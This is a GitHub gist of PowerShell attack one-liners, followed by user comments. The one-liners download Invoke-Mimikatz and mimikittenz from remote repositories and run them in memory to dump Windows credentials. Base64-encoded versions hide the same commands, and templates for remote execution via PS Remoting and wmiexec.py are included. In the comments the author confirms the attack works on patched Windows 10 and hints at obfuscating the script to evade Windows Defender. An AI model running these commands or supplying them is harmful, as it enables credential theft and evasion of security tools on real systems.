-
-
Save gfoss/ca6aa37f97fd400ff14f to your computer and use it in GitHub Desktop.
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
#mimikatz [local] | |
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
#encoded-mimikatz [local] | |
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA== | |
#ps remoting [remote] | |
Invoke-Command -ComputerName <IP-Address> -ScriptBlock {powershell etc...} | |
#impacket's wmiexec.py [remote] | |
wmiexec.py <USER:PASSWORD@IP-Address> "powershell -enc powershell etc..." | |
#mimikittenz [local] | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz | |
#encoded-mimikittenz [local] | |
powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg== |
Thanks for updating. I tried again and still got error messages for "This script contains malicious content and has been blocked by your antivirus software.". Both "#mimikatz [local]" and "#encoded-mimikatz [local]". It might be on my end or a misunderstanding of how the environment needs to be setup.
Yeah - if you have Windows Defender enabled, this will not work, unfortunately. They flag on mimikatz in all the many ways you can utilize the tool... One method that still works is obfuscating the Invoke-Mimikatz.ps1 script and hosting this on your own server. That is outside of the scope of this gist though, this is mainly to show how mimikatz works via quick proof of concept.
These seem to no longer be working now.
Thanks for the heads-up @rexbutz! I've updated this to point to the correct Empire repository and have verified that the attack now works as intended. That said, it will only be successful if Microsoft's real-time protection is disabled, other antivirus software is in use, or you get creative.
Thanks for the heads-up @clintonm9 - I've updated the gist with the newer version of Invoke-Mimikatz, available in Empire 3.0: https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
I've also modified the command slightly, to include 'Invoke-Mimikatz -Command privilege::debug;'. I've tested this successfully on the latest version of Windows 10, fully patched, etc. However this vulnerability could be locked down via organizational policy.